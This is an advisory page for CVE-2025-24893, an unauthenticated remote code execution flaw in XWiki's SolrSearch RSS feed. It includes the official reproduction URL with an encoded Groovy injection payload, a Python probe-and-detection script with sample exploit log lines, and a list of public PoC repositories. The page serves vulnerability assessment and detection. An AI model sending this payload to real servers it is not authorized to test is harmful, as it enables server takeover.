CVE-2025-24893

Remote code execution as guest via SolrSearchMacros request in xwiki

CVSS 9.8 CRITICAL · EPSS 99.9% · KEV · CWE-95
Summary

Any visitor to an XWiki site can execute arbitrary code on the server without logging in, by sending a specially crafted request to the search function. This fully compromises the confidentiality, integrity and availability of the whole installation.

Technical detail

The SolrSearch macro fails to sanitize the user-supplied `text` parameter before it is rendered as wiki syntax in the RSS feed, so an unauthenticated attacker can close the enclosing wiki-syntax block with `}}}` and inject a `{{groovy}}` macro that executes arbitrary Groovy code on the server. The root cause is the response path that writes the feed content straight to the output instead of escaping it or restricting the response to a content type of `application/xml`.

Summary generated and translated by AI from the official description.
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
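The reproduction step above checks one string in one RSS title; the following script turns it into a repeatable check and adds the matching blue-team detection. It is an added example, not code from XWiki or from any of the PoC repositories listed on this page. It builds the probe URL from the official advisory, classifies an RSS response as vulnerable or not, and flags exploitation attempts in web-server access logs. The base URL `https://wiki.example.com`, the RSS bodies and the log lines are constructed for illustration; the log-line layout (combined log format, client IP first) is an assumption. The log pattern is deliberately broader than the advisory's exact payload: any macro opening (`{{name`) inside the SolrSearch query string is flagged, so `{{velocity}}` or `{{python}}` variants are caught too.

```python
"""Check and detection helpers for CVE-2025-24893 (XWiki SolrSearch RSS
template injection).

Added example; not code from XWiki or from the PoC repositories listed
on the page. It (1) builds the probe URL from the official advisory,
(2) decides whether an RSS response shows the Groovy macro ran, and
(3) flags exploitation attempts in web-server access logs. The RSS
bodies, log lines and the host name are constructed for illustration.
Run the network probe only against instances you are authorized to test.
"""
import re
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Wiki-syntax payload from the official advisory. The leading "}}}" closes
# the block that wraps the search text in the RSS template, so the rest is
# parsed as top-level wiki syntax and the {{groovy}} macro is executed.
PAYLOAD = ('}}}{{async async=false}}{{groovy}}'
           'println("Hello from" + " search text:" + (23 + 19))'
           '{{/groovy}}{{/async}} ')
# Only produced if Groovy evaluated the concatenation; a patched instance
# echoes the raw search text, which never contains this string.
MARKER = "Hello from search text:42"


def build_probe_url(base_url: str) -> str:
    """Unauthenticated GET URL from the advisory for a base such as
    https://wiki.example.com (scheme and host are assumed)."""
    text = urllib.parse.quote(PAYLOAD, safe="")
    return f"{base_url.rstrip('/')}/xwiki/bin/get/Main/SolrSearch?media=rss&text={text}"


def is_vulnerable_response(body: str) -> bool:
    """True if any RSS <title> carries the marker (the advisory's check)."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        # Not well-formed XML: fall back to a substring check so a partially
        # rendered page that still carries the marker is not missed.
        return MARKER in body
    return any(t.text and MARKER in t.text for t in root.iter("title"))


def probe(base_url: str, timeout: float = 10.0) -> bool:
    """Send the probe and classify the response (network; authorized use only)."""
    with urllib.request.urlopen(build_probe_url(base_url), timeout=timeout) as r:
        return is_vulnerable_response(r.read().decode("utf-8", "replace"))


# Any wiki macro opening ("{{name") inside the SolrSearch query string is
# suspicious: legitimate search terms do not contain macro syntax. Broader
# than the exact advisory payload on purpose.
INJECTION_RE = re.compile(r"/Main/SolrSearch\?.*\{\{\s*[A-Za-z]", re.IGNORECASE)
# Combined log format (assumed): client IP first, request line in the first
# double-quoted field.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')


def find_exploit_attempts(log_lines):
    """Return [(line_no, client_ip, request_path)] for lines matching the
    injection pattern; the path is percent-decoded twice to catch double
    encoding of the braces."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path = m.groups()
        decoded = urllib.parse.unquote(urllib.parse.unquote(path))
        if INJECTION_RE.search(decoded):
            hits.append((n, ip, path))
    return hits


# Constructed sample responses (abridged RSS) and access-log lines.
VULNERABLE_RSS = (
    '<rss version="2.0"><channel>'
    '<title>RSS feed for search on [Hello from search text:42]</title>'
    '<link>https://wiki.example.com/xwiki/bin/view/Main/SolrSearch</link>'
    '</channel></rss>'
)
PATCHED_RSS = (
    '<rss version="2.0"><channel>'
    '<title>RSS feed for search on [' + PAYLOAD + ']</title>'
    '</channel></rss>'
)
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2025:10:15:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch'
    '?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D'
    'println%28%22x%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '198.51.100.4 - - [10/Nov/2025:10:16:22 +0000] "GET /xwiki/bin/view/Main/SolrSearch'
    '?text=release+notes HTTP/1.1" 200 9134 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Nov/2025:10:17:45 +0000] "GET /xwiki/bin/get/Main/SolrSearch'
    '?media=rss&text=%257D%257D%257D%257B%257Bgroovy%257D%257Dprintln%2528%25221%2522%2529'
    '%257B%257B%252Fgroovy%257D%257D HTTP/1.1" 200 480 "-" "python-requests/2.32"',
]

if __name__ == "__main__":
    print(build_probe_url("https://wiki.example.com"))  # assumed host
    print("vulnerable sample:", is_vulnerable_response(VULNERABLE_RSS))
    print("patched sample:", is_vulnerable_response(PATCHED_RSS))
    for n, ip, path in find_exploit_attempts(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {path[:70]}")
```

`is_vulnerable_response` keys on the concatenated marker rather than on the raw payload because a patched instance echoes the search text back verbatim: `"Hello from" + " search text:" + (23 + 19)` only becomes `Hello from search text:42` if Groovy actually ran. On the detection side, a patched server still logs these requests, so a hit in `find_exploit_attempts` means an attempt, not a confirmed compromise; correlate it with the response size and any follow-up requests from the same client.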
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected products
xwiki · xwiki-platform
Public PoCs found: 41

github · github.com/gunzf0x/CVE-2025-24893 (22)
github · github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC (17)
github · github.com/b0ySie7e/CVE-2025-24893 (11)
github · github.com/iSee857/CVE-2025-24893-PoC (10)
github · github.com/Infinit3i/CVE-2025-24893 (6)
github · github.com/Hex00-0x4/CVE-2025-24893-XWiki-RCE (6)
github · github.com/AliElKhatteb/CVE-2024-32019-POC (5)
github · github.com/hackersonsteroids/cve-2025-24893 (5)
github · github.com/D3Ext/CVE-2025-24893 (4)
github · github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc (3)
github · github.com/torjan0/xwiki_solrsearch-rce-exploit (2)
github · github.com/BreakingRohit/CVE-2025-24893-PoC (2)
github · github.com/Artemir7/CVE-2025-24893-EXP (2)
github · github.com/Th3Gl0w/CVE-2025-24893-POC (1)
github · github.com/IIIeJlyXaKapToIIIKu/CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch (1)
github · github.com/x0da6h/POC-for-CVE-2025-24893 (1)
github · github.com/80Ottanta80/CVE-2025-24893-PoC (1)
github · github.com/vasilysaint/CVE-2025-24893 (1)
github · github.com/alaxar/CVE-2025-24893 (0)
github · github.com/zs1n/CVE-2025-24893 (0)
github · github.com/Retro023/CVE-2025-24893-POC (0)
github · github.com/CMassa/CVE-2025-24893 (0)
github · github.com/Fomovet/cve-2025-24893 (0)
github · github.com/ibadovulfat/CVE-2025-24893 (0)
github · github.com/gmh5225/CVE-2025-24893-RCE-PoC (0)
github · github.com/AzureADTrent/CVE-2025-24893-Reverse-Shell (0)
github · github.com/andwati/CVE-2025-24893 (0)
github · github.com/Bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893 (0)
github · github.com/kimtangker/CVE-2025-24893 (0)
github · github.com/investigato/cve-2025-24893-poc (0)
github · github.com/The-Red-Serpent/CVE-2025-24893 (0)
github · github.com/0xDTC/XWiki-Platform-RCE-CVE-2025-24893 (0)
github · github.com/o0wo0o/CVE-2025-24893_Shell (0)
github · github.com/dhiaZnaidi/CVE-2025-24893-PoC (0)
github · github.com/TomKingori/xwiki-cve-2025-24893-exploit (0)
github · github.com/nohack1212/CVE-2025-24893- (0)
github · github.com/rippsec/CVE-2025-24893-XWiki-SSTI-RCE (0)
github · github.com/hasecto/CVE-2025-24893 (0)
github · github.com/mah4nzfr/CVE-2025-24893 (0)
exploit-db · www.exploit-db.com/exploits/52429 (not verified)
exploit-db · www.exploit-db.com/exploits/52136 (not verified)
⚠ Public resources, for assessing the exposure of systems you control or are authorized to test. Test only with authorization.
